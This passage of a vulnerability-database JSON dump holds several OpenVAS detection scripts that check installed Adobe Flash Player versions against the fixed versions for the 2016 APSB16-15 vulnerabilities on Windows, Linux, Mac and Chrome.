overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.621 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.621 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.621\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.621\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:33", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", 
"CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310807698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807698", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807698\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A 
buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.352 and 20.x before 21.0.0.242 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.352, or 21.0.0.242, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.241\"))\n{\n fix = \"21.0.0.242\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.352\"))\n{\n fix = \"18.0.0.352\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:06:58", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-064.", "cvss3": {}, "published": 
"2017-03-18T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2020-05-14T00:00:00", "id": "OPENVAS:1361412562310810654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810654\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 14:50:56 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-064.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A 
heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-064\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, 
test_version:\"21.0.0.242\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 21.0.0.242\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:19:13", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810655", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810655\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 14:56:27 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - 
Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:24", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux", "bulletinFamily": "scanner", "cvss2": {}, 
"cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810657", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810657\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:02:18 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple 
use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:48", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", 
"CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310807699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807699", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807699\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A 
buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.352 and 20.x before 21.0.0.242 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.352, or 21.0.0.242, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.241\"))\n{\n fix = \"21.0.0.242\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.352\"))\n{\n fix = \"18.0.0.352\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:15:53", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": 
